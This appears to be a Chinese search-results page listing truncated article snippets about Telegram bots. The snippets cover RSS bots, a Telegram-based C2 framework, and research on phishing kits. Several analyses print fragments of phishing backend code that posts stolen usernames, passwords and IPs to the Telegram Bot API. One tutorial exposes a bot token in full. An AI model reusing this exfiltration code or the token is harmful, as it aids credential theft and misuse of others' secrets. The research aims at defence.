文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布

命令控制之Telegram

Cracking Telegram Encryption,而且Telegram支持发送所有文件类型,Telegram提供对外开放的api,用户可定制性的开发客户端。...Telegram的Bots是Tegegram内置的第三方应用,通信方式为HTTPS,功能类似于聊天机器人,它可以获取定制化的信息,结合其他的服务使用,同时可以创建自定义的工具。...之后成功创建Token: 12724xxxx059:AAEINExxxxxxxxxxxxxxxxxxx_hIl8A Bot API 示例 安装依赖 目前Telegram官网已经公开了如下语言的开发实例:...以上介绍了Bot API中发送、接收文本消息和上传、下载文件的功能,剩下只需要将功能拼接,添加命令解析,就可以实现一个简易的C2 Server POC bt2框架 项目介绍 Bt2是一个使用python...编写开发的C2框架,它使用了telegram提供的基础设施和功能丰富的bot api,稍微改变了其通信平台的用途,使其可以充当c&c。

4K20

一封“域名续费”邮件,竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

二、攻击全链路拆解:从邮件到Telegram的“数据流水线”根据Gawande公开的技术分析(来源:SC Media, GitHub样本仓库, VirusTotal扫描记录),此次钓鱼攻击呈现出极强的工程化特征...攻击者在后端使用Python或Node.js脚本,将收集到的数据通过Telegram Bot API实时推送至私有频道:# 攻击者服务器后端(Python + python-telegram-bot)import...2025年11月,国内安全团队曾捕获仿冒“阿里云域名续费”的钓鱼页(aliyun-domain-renew[.]top),页面完全中文化,并声称“根据工信部新规,需人工审核续费申请”,诱导用户上传身份证...+银行卡照片。...开发者视角:如何设计更安全的支付流程?

1900
    • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    钓鱼攻击中窃取数据的流转路径与防御机制研究

    研究结果表明,仅依赖传统反钓鱼教育已不足以应对当前威胁,需构建覆盖数据生命周期全阶段的纵深防御体系。...因此,本文旨在回答以下核心问题:(1)钓鱼窃取的数据如何被传输、存储与分类?(2)地下市场如何对不同类型凭证进行估值与交易?(3)攻击者如何利用这些数据实施二次乃至多次攻击?...因此,2020年后,此类方式使用率显著下降。2.2 Telegram Bot 成为主流回传通道当前绝大多数钓鱼页面嵌入Telegram Bot API实现即时数据推送。...攻击者首先在Telegram上创建Bot并获取token,随后在钓鱼脚本中调用Telegram的sendMessage接口。...5 防御机制设计与实践5.1 终端用户层面:打破密码复用链最根本的防御在于消除密码复用。建议用户使用密码管理器生成并存储唯一强密码。

    13810

    Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

    摘要近年来,即时通讯平台因其开放的Bot API和高用户渗透率,逐渐被网络犯罪组织武器化。...本文聚焦该攻击范式,旨在回答三个问题:(1)Telegram机器人如何嵌入钓鱼攻击链并提升其交互性?(2)其技术实现是否存在可检测的行为特征?(3)组织应如何调整现有安全策略以阻断此类人机协同攻击?...Bot后端通常为Python脚本,使用python-telegram-bot库:from telegram import Updatefrom telegram.ext import Application...整个过程在5分钟内完成,且因使用真实品牌界面与即时交互,成功率显著高于传统钓鱼。4 技术检测与防御方案4.1 封禁Telegram关联基础设施安全网关应识别并阻断与已知恶意Bot关联的通信。...需依赖精准IOC而非全平台阻断。第二,Bot Token的动态轮换。攻击者可每日更换Bot,使静态规则失效。需结合流量行为(如高频POST至Telegram API)而非仅依赖Token字符串。

    16810

    Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

    本文聚焦于2025年曝光的一类以Telegram为核心载体的高级钓鱼活动,系统剖析其如何利用Bot API、公开频道、WebView嵌入及消息自毁等原生功能,实现凭据窃取、会话劫持与恶意分发的闭环。...此类攻击的核心挑战在于其“合法性掩护”:所有通信均经由telegram.org域名完成,符合SPF/DKIM/DMARC标准;Bot API调用使用HTTPS加密;消息支持自毁与私聊加密,极大增加取证难度...更重要的是,传统安全设备难以区分正常用户使用Telegram与恶意Bot数据回传之间的流量差异。...现有研究多集中于Telegram作为C2通道的初步识别[1][2],但对其在钓鱼全生命周期中的深度整合——从诱饵分发、凭证捕获到实时运营——缺乏系统性解构。...6 结语本文系统分析了Telegram基础设施在现代钓鱼攻击中的滥用模式,阐明其如何通过Bot API、频道分发与WebView嵌入实现端到端攻击闭环。

    23210

    利用Telegram搭建RSS中文订阅机器人(rssbot)

    前言 我们很多人喜欢一些网站或者博客,有时候会错过好东西或者福利,今天介绍下如何用 Telegram 做一个自己的 RSS 订阅机器人,这样我们可以非常方便的通过它来实现在 Telegram 里订阅网站并快速推送...完成后妥善保管专属的 HTTP API TOKEN(保存好,之后会用到)。...2、搭建 rssbot 这里直接使用开源的中文 Telegram RSS 机器人就行,项目地址:https://github.com/iovxw/rssbot 下面将介绍预编译版本的使用方法,执行如下命令.../null 2>&1 & 其中,第三行命令的 TELEGRAM-BOT-TOKEN 就是你创建的 Telegram 机器人的 API TOKEN。.../rssbot DATAFILE TELEGRAM-BOT-TOKEN > /dev/null 2>&1 & # 方法2 使用setsid命令 setsid .

    8K41

    telegram-1:向tg的机器人群推送消息

    Telegram Bot的创建简单,API全面且免费,适合国际业务。 业务需求:最近需要将自动客户端的自动打包结果的二维码和下载地址推送到tg机器人群,需要了解。...这是一个测试用的bot: token:5049056695:AAFfyxCap2I0SZazC0DJ7WPw5oBz9oZcl7A username:@test1aJHcqb3iU_bot 可以在浏览器中使用...浏览器访问下述url获取这个群组的chat_id: https://api.telegram.org/bot5049056695:AAFfyxCap2I0SZazC0DJ7WPw5oBz9oZcl7A/...getUpdates 在返回值中找到这个群组的chat_id,机器人会向这个chat_id发送消息: -750599670 (3).python向bot推送消息的demo 1.相关准备 去官网查看下api...: https://core.telegram.org/bots/api 需要用到 python-telegram-bot 库。

    11.8K30

    部署你的RSS机器人

    API 的环境)(可忽略) mysql(MySQL 数据库配置)(可忽略) sqlite(SQLite 配置)(可忽略(已配置 mysql 时,该项失效)) telegram.endpoint(自定义...telegram bot api url)(可忽略) allowed_users(允许使用 bot 的用户 telegram id)(可忽略(为空时所有用户都能使用 bot)) 申请 Telegram...author_url 请替换成自己的 查看 Telegram ID | 默认的配置是允许所有用户使用我们刚刚创建的 Telegram RSS Bot,但为了安全、防止被滥用我们可以设置指定 ID 的...Telegram 用户能够使用该 Bot,获取允许使用用户(比如自己)的 Telegram ID 并填入配置文件的 allowed_users 字段 获取 Telegram ID:https://t.me...start=botostore 使用 将 Bot 添加到您的频道中,并设置为管理员,Bot 的管理命令如下: /sub @ChannelID [url] 订阅 /unsub @ChannelID [url

    1.3K20

    盘点 | 聊天机器人的发展状况与分类

    Step 2 - 在Botframework上注册账号 创建一个Bot, 同时下载Botframework提供的SDK/Sample( Node.js|C#),连接到Telegram。 ?...Step 4 - 服务发布 Telegram是一个神奇的IM,它提供了聊天机器人应用商店。使用Telegram IM的用户可以快速体验和使用这些Bot。 ?...一些Bot的体验真的很棒,尤其是使用了人工智能技术的Bot,以至于会出现下面的评论。 ?...Chatbot就要询问: Bot: 你需要订哪家酒店? 长对话,其实就是能在用户场景下对话,要识别场景,就需要考虑时间、地点、刚刚用户都说了什么,以及用户和Bot的关系。...如何判断一个模型的好坏 在使用LSTM训练基于生成的模型的过程中,一个很大的挑战就是没有自动化的量化的标准:除了人工的和模型对话意外,不确定模型间的好坏。

    3.1K80

    TG限制群组转存机器人

    文章目录[隐藏] 1.部署 2.环境变量 3.使用方法 4.批量转存 5.项目地址 Telegram 在2021年底的一次更新中为群组增加了“禁止转发”功能,开启后普通成员便无法从群组中复制、转发或者保存任何内容...2.环境变量 想要让代码正确的跑起来,在部署时还需要设置以下环境变量:API_ID, API_HASH, SESSION, BOT_TOKEN, AUTH, FORCESUB 。...其中 API_ID 和 API_HASH 可以从 https://my.telegram.org/apps 获取,登陆后直接复制即可。 SESSION 可以使用这个网页运行一段小程序来获取。...BOT_TOKEN 需要向 @botfather 申请一个,按提示输入名称等各项信息即可。 AUTH 为管理员的账号 ID ,可以通过 @myidbot 获取。...3.使用方法 只需要把想转存的消息链接发给机器人即可,内容既可以是文字也可以是媒体或文件。由于机器人需要下载后重新上传,文件比较大的话就需要稍等片刻。

    14.2K20

    一个基于Go的Telegram RSS Bot机器人,支持应用内阅读预览

    说明:很久前博主介绍过一个Telegram RSS机器人→传送门,用起来还不错,就是安装对新手不太友好,这里就再介绍一个基于Go的Telegram RSS Bot,安装很快,也支持直接在Telegram...应用内预览订阅文章,很方便,也是博主用过最好用的一个Telegram RSS机器人,这里就说下使用方法。...100 #自定义telegram bot api url,选填 telegram: endpoint: https://xxx.com/ #使用Mysql数据库,不填则默认使用SQLite mysql.../data.db ##这里博主默认使用的SQLite,扫描间隔为5分钟,所以使用到的参数如下: bot_token: XXX telegraph_token: xxxx update_interval.../set 设置订阅 /help 帮助 Channel订阅使用方法: 1、将Bot添加为Channel管理员 2、发送相关命令给Bot #Channel订阅支持的命令 /sub @ChannelID

    2.1K00

    钓鱼团伙用Telegram机器人“接单”:欧洲凭证窃取进入“实时客服”时代

    "时间: " . date('Y-m-d H:i:s');// 调用Telegram API发送消息file_get_contents("https://api.telegram.org/bot{$bot_token...开放API成双刃剑Telegram之所以成为钓鱼团伙的首选平台,源于其三大特性:Bot API完全开放且文档完善:开发者可轻松创建具备消息推送、按钮交互、文件传输能力的机器人;端到端加密非默认启用:普通群组和频道通信未加密...事后分析发现,攻击者使用的Telegram机器人名为 @CloudGrabber_Bot,其频道中同时监控着来自12个国家的 87个活跃钓鱼站点,平均每15分钟就有一次新凭证捕获。...网络层:封禁高风险Telegram基础设施在防火墙或代理中,基于威胁情报封禁已知与钓鱼相关的Telegram Bot Token、Channel ID对应的IP段;使用DNS过滤服务(如Cisco Umbrella...“我们不能只盯着Telegram,而要关注任何支持自动化消息交互的平台。”芦笛提醒,“防御的核心,是识别‘异常数据流向’,而非特定应用。”七、SOC如何应对?

    6410

    面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

    本文旨在深入剖析该钓鱼活动的全生命周期,重点回答以下问题:(1)攻击者如何利用托管服务的业务特性设计社会工程话术?(2)仿冒站点在技术上如何规避检测并增强欺骗性?(3)现有安全措施为何失效?...(4)应如何构建兼顾用户体验与安全性的纵深防御体系?...email=user@domain.com)自动填入登录框,增强真实性;Telegram Bot数据外传:用户提交凭证后,数据通过HTTPS POST至中间脚本,再由Python脚本推送至攻击者控制的Telegram...3.3 数据外泄路径典型数据流如下:Victim → Fake Login Page → PHP Collector Script → Telegram Bot (via API) → Attacker...(creds):url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"payload = {"chat_id": CHAT_ID,"text

    18410

    小心,你放在社交网络上的图,正被Deepfake机器人用来生成果体照

    最近,外媒The Verge曝光了这个现象: 在Telegram上,Deepfake机器人泛滥,随便一张社交网络上的照片,即可自动生成开车图。 还可以直接携图分享。...这意味着,生成的图片总数,包括那些未曾分享过、或是7月以来制作的照片,是远远高于这个数字的。 Sensity表示,这些频道中的大部分用户,大概有70%来自俄罗斯和周边国家。...Deepfake机器人 这些机器人可以免费使用,不过会生成带有「FAKE」的红色字样水印,或只有部分果体的果体照片。 想要「升级」照片,用户需要一定的费用,来「揭开」这些照片。 比如,「初级收费」。...如果你有思考和建议,也欢迎分享~ 参考链接: https://www.theverge.com/2020/10/20/21519322/deepfake-fake-nudes-telegram-bot-deepnude-sensity-report...scrolla=5eb6d68b7fedc32c19ef33b4 https://www.cnet.com/news/a-deepfake-bot-on-telegram-is-violating-women-by-forging-nudes-from-regular-pics

    1.4K20

    RasaGpt——一款基于Rasa和LLM的聊天机器人平台

    很多实现细节都已经处理好了,你不需要自己动手,包括: •使用FastAPI创建你自己的专有bot端点,包括文档上传和“训练”流程。•如何将Langchain/LlamaIndex和Rasa集成。...5.使用Rasa设置ngrok,以便Telegram具有回复您的API服务器的Webhook6.设置Rasa actions服务器,以便Rasa可以与RasaGPT API进行通信7.使用seed.py...Telegram 1.Rasa会自动使用你在 credentials.yml[27] 文件中设置的回调webhook,自动更新Telegram Bot API。2.默认情况下,这是静态的。...机器人流程 1.用户将在 Telegram 聊天,并且消息将经过现有意图[36]的筛选。...只需执行以下操作: curl -sS "https://api.telegram.org/botbot-secret-token>/getWebhookInfo" | json_pp 上述命令应返回此内容

    5.8K20

    精准围猎:新型钓鱼工具包专攻意大利,本地化伪装成网络犯罪新范式

    而此工具包直接集成 Telegram Bot API,实现秒级通知:import requestsdef send_to_telegram(username, password, ip):bot_token...: {password}\nIP: {ip}"url = f"https://api.telegram.org/bot{bot_token}/sendMessage"requests.post(url,...data={'chat_id': chat_id, 'text': message})由于 Telegram 在意大利广泛使用且通信加密,执法部门难以追踪 Bot 控制者。...例如:伪造“国家税务总局”邮件,声称“个税汇算清缴异常”,诱导用户点击链接“重新认证”;模拟“健康码失效”通知,引导至仿冒的省级政务 App 下载页,植入木马;冒充“电子营业执照更新”,要求法人代表在钓鱼页面输入统一社会信用代码及法人身份证号...他们知道意大利人会在什么时间收到税务通知,知道 SPID 用户最担心什么,知道如何用一句地道的 “Gentile Utente” 打开信任之门。而我们的防御,不能再停留在“识别 bad URL”层面。

    7510
    点击加载更多

    相关资讯

    热门标签

    更多标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      腾讯云开发者

      扫码关注腾讯云开发者

      扫码关注腾讯云开发者

      领取腾讯云代金券

      热门产品

      热门推荐

      更多推荐

      Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

      深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

      腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

      领券